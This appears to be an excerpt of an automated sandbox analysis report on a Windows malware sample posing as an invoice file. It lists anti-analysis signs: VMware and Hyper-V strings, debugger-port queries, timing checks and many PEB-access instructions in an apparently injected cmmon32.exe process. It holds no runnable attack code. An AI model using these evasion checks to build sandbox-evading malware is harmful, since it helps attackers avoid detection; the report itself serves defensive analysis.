Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.668746120.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.675542552.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000003.00000000.675644781.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: CI_PL #WS190903_20201016_XLs.exe, 00000000.00000002.656545150.00000000025D0000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000003.00000002.920992189.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe Process queried: DebugPort (5 occurrences)
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe	Code function: 2_2_00409A90 rdtsc	2_2_00409A90
Source: C:\Users\user\Desktop\CI_PL #WS190903_20201016_XLs.exe	Code function: 2_2_0040ACD0 LdrLoadDll,	2_2_0040ACD0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC8CD6 mov eax, dword ptr fs:[00000030h]	5_2_04DC8CD6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB14FB mov eax, dword ptr fs:[00000030h]	5_2_04DB14FB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76CF0 mov eax, dword ptr fs:[00000030h]	5_2_04D76CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76CF0 mov eax, dword ptr fs:[00000030h]	5_2_04D76CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76CF0 mov eax, dword ptr fs:[00000030h]	5_2_04D76CF0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0849B mov eax, dword ptr fs:[00000030h]	5_2_04D0849B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8C450 mov eax, dword ptr fs:[00000030h]	5_2_04D8C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8C450 mov eax, dword ptr fs:[00000030h]	5_2_04D8C450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2A44B mov eax, dword ptr fs:[00000030h]	5_2_04D2A44B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1746D mov eax, dword ptr fs:[00000030h]	5_2_04D1746D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC740D mov eax, dword ptr fs:[00000030h]	5_2_04DC740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC740D mov eax, dword ptr fs:[00000030h]	5_2_04DC740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC740D mov eax, dword ptr fs:[00000030h]	5_2_04DC740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1C06 mov eax, dword ptr fs:[00000030h]	5_2_04DB1C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]	5_2_04D76C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]	5_2_04D76C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]	5_2_04D76C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76C0A mov eax, dword ptr fs:[00000030h]	5_2_04D76C0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2BC2C mov eax, dword ptr fs:[00000030h]	5_2_04D2BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]	5_2_04D76DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]	5_2_04D76DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]	5_2_04D76DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76DC9 mov ecx, dword ptr fs:[00000030h]	5_2_04D76DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]	5_2_04D76DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D76DC9 mov eax, dword ptr fs:[00000030h]	5_2_04D76DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DA8DF1 mov eax, dword ptr fs:[00000030h]	5_2_04DA8DF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0D5E0 mov eax, dword ptr fs:[00000030h]	5_2_04D0D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0D5E0 mov eax, dword ptr fs:[00000030h]	5_2_04D0D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]	5_2_04DBFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]	5_2_04DBFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]	5_2_04DBFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBFDE2 mov eax, dword ptr fs:[00000030h]	5_2_04DBFDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]	5_2_04CF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]	5_2_04CF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]	5_2_04CF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]	5_2_04CF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF2D8A mov eax, dword ptr fs:[00000030h]	5_2_04CF2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2FD9B mov eax, dword ptr fs:[00000030h]	5_2_04D2FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2FD9B mov eax, dword ptr fs:[00000030h]	5_2_04D2FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]	5_2_04D22581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]	5_2_04D22581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]	5_2_04D22581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D22581 mov eax, dword ptr fs:[00000030h]	5_2_04D22581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D21DB5 mov eax, dword ptr fs:[00000030h]	5_2_04D21DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D21DB5 mov eax, dword ptr fs:[00000030h]	5_2_04D21DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D21DB5 mov eax, dword ptr fs:[00000030h]	5_2_04D21DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC05AC mov eax, dword ptr fs:[00000030h]	5_2_04DC05AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC05AC mov eax, dword ptr fs:[00000030h]	5_2_04DC05AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D235A1 mov eax, dword ptr fs:[00000030h]	5_2_04D235A1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D17D50 mov eax, dword ptr fs:[00000030h]	5_2_04D17D50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D33D43 mov eax, dword ptr fs:[00000030h]	5_2_04D33D43
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D73540 mov eax, dword ptr fs:[00000030h]	5_2_04D73540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1C577 mov eax, dword ptr fs:[00000030h]	5_2_04D1C577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1C577 mov eax, dword ptr fs:[00000030h]	5_2_04D1C577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D7A537 mov eax, dword ptr fs:[00000030h]	5_2_04D7A537
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBE539 mov eax, dword ptr fs:[00000030h]	5_2_04DBE539
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D03D34 mov eax, dword ptr fs:[00000030h]	5_2_04D03D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC8D34 mov eax, dword ptr fs:[00000030h]	5_2_04DC8D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D24D3B mov eax, dword ptr fs:[00000030h]	5_2_04D24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D24D3B mov eax, dword ptr fs:[00000030h]	5_2_04D24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D24D3B mov eax, dword ptr fs:[00000030h]	5_2_04D24D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFAD30 mov eax, dword ptr fs:[00000030h]	5_2_04CFAD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC8ED6 mov eax, dword ptr fs:[00000030h]	5_2_04DC8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D38EC7 mov eax, dword ptr fs:[00000030h]	5_2_04D38EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DAFEC0 mov eax, dword ptr fs:[00000030h]	5_2_04DAFEC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D236CC mov eax, dword ptr fs:[00000030h]	5_2_04D236CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D216E0 mov ecx, dword ptr fs:[00000030h]	5_2_04D216E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D076E2 mov eax, dword ptr fs:[00000030h]	5_2_04D076E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8FE87 mov eax, dword ptr fs:[00000030h]	5_2_04D8FE87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D746A7 mov eax, dword ptr fs:[00000030h]	5_2_04D746A7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC0EA5 mov eax, dword ptr fs:[00000030h]	5_2_04DC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC0EA5 mov eax, dword ptr fs:[00000030h]	5_2_04DC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC0EA5 mov eax, dword ptr fs:[00000030h]	5_2_04DC0EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]	5_2_04D07E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]	5_2_04D07E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]	5_2_04D07E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]	5_2_04D07E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]	5_2_04D07E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D07E41 mov eax, dword ptr fs:[00000030h]	5_2_04D07E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBAE44 mov eax, dword ptr fs:[00000030h]	5_2_04DBAE44
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DBAE44 mov eax, dword ptr fs:[00000030h]	5_2_04DBAE44
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]	5_2_04D1AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]	5_2_04D1AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]	5_2_04D1AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]	5_2_04D1AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1AE73 mov eax, dword ptr fs:[00000030h]	5_2_04D1AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0766D mov eax, dword ptr fs:[00000030h]	5_2_04D0766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2A61C mov eax, dword ptr fs:[00000030h]	5_2_04D2A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2A61C mov eax, dword ptr fs:[00000030h]	5_2_04D2A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFC600 mov eax, dword ptr fs:[00000030h]	5_2_04CFC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFC600 mov eax, dword ptr fs:[00000030h]	5_2_04CFC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFC600 mov eax, dword ptr fs:[00000030h]	5_2_04CFC600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D28E00 mov eax, dword ptr fs:[00000030h]	5_2_04D28E00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB1608 mov eax, dword ptr fs:[00000030h]	5_2_04DB1608
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DAFE3F mov eax, dword ptr fs:[00000030h]	5_2_04DAFE3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFE620 mov eax, dword ptr fs:[00000030h]	5_2_04CFE620
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D337F5 mov eax, dword ptr fs:[00000030h]	5_2_04D337F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D77794 mov eax, dword ptr fs:[00000030h]	5_2_04D77794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D77794 mov eax, dword ptr fs:[00000030h]	5_2_04D77794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D77794 mov eax, dword ptr fs:[00000030h]	5_2_04D77794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D08794 mov eax, dword ptr fs:[00000030h]	5_2_04D08794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0EF40 mov eax, dword ptr fs:[00000030h]	5_2_04D0EF40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0FF60 mov eax, dword ptr fs:[00000030h]	5_2_04D0FF60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC8F6A mov eax, dword ptr fs:[00000030h]	5_2_04DC8F6A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1F716 mov eax, dword ptr fs:[00000030h]	5_2_04D1F716
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8FF10 mov eax, dword ptr fs:[00000030h]	5_2_04D8FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8FF10 mov eax, dword ptr fs:[00000030h]	5_2_04D8FF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC070D mov eax, dword ptr fs:[00000030h]	5_2_04DC070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC070D mov eax, dword ptr fs:[00000030h]	5_2_04DC070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2A70E mov eax, dword ptr fs:[00000030h]	5_2_04D2A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2A70E mov eax, dword ptr fs:[00000030h]	5_2_04D2A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF4F2E mov eax, dword ptr fs:[00000030h]	5_2_04CF4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF4F2E mov eax, dword ptr fs:[00000030h]	5_2_04CF4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2E730 mov eax, dword ptr fs:[00000030h]	5_2_04D2E730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04D8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_04D8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04D8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04D8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04D8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D8B8D0 mov eax, dword ptr fs:[00000030h]	5_2_04D8B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF58EC mov eax, dword ptr fs:[00000030h]	5_2_04CF58EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF40E1 mov eax, dword ptr fs:[00000030h]	5_2_04CF40E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF40E1 mov eax, dword ptr fs:[00000030h]	5_2_04CF40E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF40E1 mov eax, dword ptr fs:[00000030h]	5_2_04CF40E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CF9080 mov eax, dword ptr fs:[00000030h]	5_2_04CF9080
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D73884 mov eax, dword ptr fs:[00000030h]	5_2_04D73884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D73884 mov eax, dword ptr fs:[00000030h]	5_2_04D73884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2F0BF mov ecx, dword ptr fs:[00000030h]	5_2_04D2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2F0BF mov eax, dword ptr fs:[00000030h]	5_2_04D2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2F0BF mov eax, dword ptr fs:[00000030h]	5_2_04D2F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]	5_2_04D220A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]	5_2_04D220A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]	5_2_04D220A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]	5_2_04D220A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]	5_2_04D220A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D220A0 mov eax, dword ptr fs:[00000030h]	5_2_04D220A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D390AF mov eax, dword ptr fs:[00000030h]	5_2_04D390AF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D10050 mov eax, dword ptr fs:[00000030h]	5_2_04D10050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D10050 mov eax, dword ptr fs:[00000030h]	5_2_04D10050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DB2073 mov eax, dword ptr fs:[00000030h]	5_2_04DB2073
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC1074 mov eax, dword ptr fs:[00000030h]	5_2_04DC1074
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D77016 mov eax, dword ptr fs:[00000030h]	5_2_04D77016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D77016 mov eax, dword ptr fs:[00000030h]	5_2_04D77016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D77016 mov eax, dword ptr fs:[00000030h]	5_2_04D77016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC4015 mov eax, dword ptr fs:[00000030h]	5_2_04DC4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04DC4015 mov eax, dword ptr fs:[00000030h]	5_2_04DC4015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]	5_2_04D0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]	5_2_04D0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]	5_2_04D0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D0B02A mov eax, dword ptr fs:[00000030h]	5_2_04D0B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]	5_2_04D2002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]	5_2_04D2002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]	5_2_04D2002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]	5_2_04D2002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2002D mov eax, dword ptr fs:[00000030h]	5_2_04D2002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFB1E1 mov eax, dword ptr fs:[00000030h]	5_2_04CFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFB1E1 mov eax, dword ptr fs:[00000030h]	5_2_04CFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04CFB1E1 mov eax, dword ptr fs:[00000030h]	5_2_04CFB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D841E8 mov eax, dword ptr fs:[00000030h]	5_2_04D841E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D22990 mov eax, dword ptr fs:[00000030h]	5_2_04D22990
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D1C182 mov eax, dword ptr fs:[00000030h]	5_2_04D1C182
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D2A185 mov eax, dword ptr fs:[00000030h]	5_2_04D2A185
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 5_2_04D751BE mov eax, dword ptr fs:[00000030h]	5_2_04D751BE
